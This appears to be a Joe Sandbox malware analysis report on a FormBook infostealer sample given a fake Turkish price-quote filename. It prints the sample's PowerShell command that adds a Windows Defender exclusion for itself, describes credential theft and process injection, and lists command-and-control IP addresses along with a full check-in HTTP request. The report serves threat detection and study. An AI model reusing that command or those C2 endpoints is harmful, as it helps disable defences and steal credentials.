Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe

Overview

General Information

Sample name:Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Analysis ID:1466660
MD5:7c9c6894ac6c53f5066c4e42a0e2121f
SHA1:8f6ed8a129c9968be749912335313e0886eb93e8
SHA256:a8528698af2f0256467229c6e265bad403c57d941040cfd94678516769587394
Tags:exegeoTUR
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe (PID: 6604 cmdline: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" MD5: 7C9C6894AC6C53F5066C4E42A0E2121F)
    • powershell.exe (PID: 7180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" MD5: 7C9C6894AC6C53F5066C4E42A0E2121F)
      • owYCvHvzfwuh.exe (PID: 3868 cmdline: "C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • unregmp2.exe (PID: 7508 cmdline: "C:\Windows\SysWOW64\unregmp2.exe" MD5: 51629AAAF753C6411D0B7D37620B7A83)
          • owYCvHvzfwuh.exe (PID: 1356 cmdline: "C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x49742:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x32cf1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ab40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dfc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17572:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ParentImage: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ParentProcessId: 6604, ParentProcessName: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ProcessId: 7180, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ParentImage: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ParentProcessId: 6604, ParentProcessName: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ProcessId: 7180, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ParentImage: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ParentProcessId: 6604, ParentProcessName: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ProcessId: 7180, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:07/03/24-08:55:01.105331
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:20.732693
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:02.020834
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:53:24.844984
            SID:2855465
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:29.093709
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:04.638587
            SID:2855464
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:36.014218
            SID:2855464
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:23.384319
            SID:2855465
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:53:40.500764
            SID:2855464
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:18.562243
            SID:2855464
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:15.453695
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:50.135997
            SID:2855465
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:44.777107
            SID:2855465
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:33.481768
            SID:2855464
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:41.357758
            SID:2855465
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:16.022083
            SID:2855464
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:23.640915
            SID:2855465
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:09.881718
            SID:2855465
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:42.559837
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:06.168627
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:37.153150
            SID:2855464
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:02.093268
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:15.772854
            SID:2855464
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:18.312501
            SID:2855464
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:58.567220
            SID:2855464
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:53:56.921708
            SID:2855464
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:53:48.213388
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:56:55.682832
            SID:2855464
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:53:43.084184
            SID:2855464
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:26.552687
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:47.620909
            SID:2855465
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:12.911126
            SID:2855464
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:54:39.703690
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:53:54.381543
            SID:2855464
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:34.151088
            SID:2855465
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-08:55:40.021503
            SID:2855464
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeReversingLabs: Detection: 60%
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeVirustotal: Detection: 60%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeJoe Sandbox ML: detected
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: unregmp2.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: owYCvHvzfwuh.exe, 00000008.00000002.3778328626.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3778593047.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: unregmp2.pdbGCTL source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDBE00 FindFirstFileW,FindNextFileW,FindClose,9_2_00BDBE00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then xor eax, eax9_2_00BC97B0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then pop edi9_2_00BCE09E
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then mov ebx, 00000004h9_2_0502053E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49713 -> 23.111.180.146:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49714 -> 103.197.25.241:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49715 -> 103.197.25.241:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49718 -> 103.197.25.241:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49719 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49722 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49723 -> 212.227.172.254:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 212.227.172.254:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49726 -> 212.227.172.254:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49727 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49730 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49731 -> 109.95.158.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 109.95.158.122:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49734 -> 109.95.158.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49735 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49738 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49739 -> 35.227.248.111:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 35.227.248.111:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49742 -> 35.227.248.111:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49743 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49744 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49746 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49747 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49748 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49750 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49751 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49752 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49754 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49755 -> 66.235.200.146:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49756 -> 66.235.200.146:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49758 -> 66.235.200.146:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49759 -> 23.111.180.146:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49760 -> 103.197.25.241:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.evertudy.xyz
            Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
            Source: Joe Sandbox ViewIP Address: 23.111.180.146 23.111.180.146
            Source: Joe Sandbox ViewIP Address: 103.197.25.241 103.197.25.241
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
            Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: DHOSTING-ASWarsawPolandPL DHOSTING-ASWarsawPolandPL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1Host: www.highwavesmarine.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
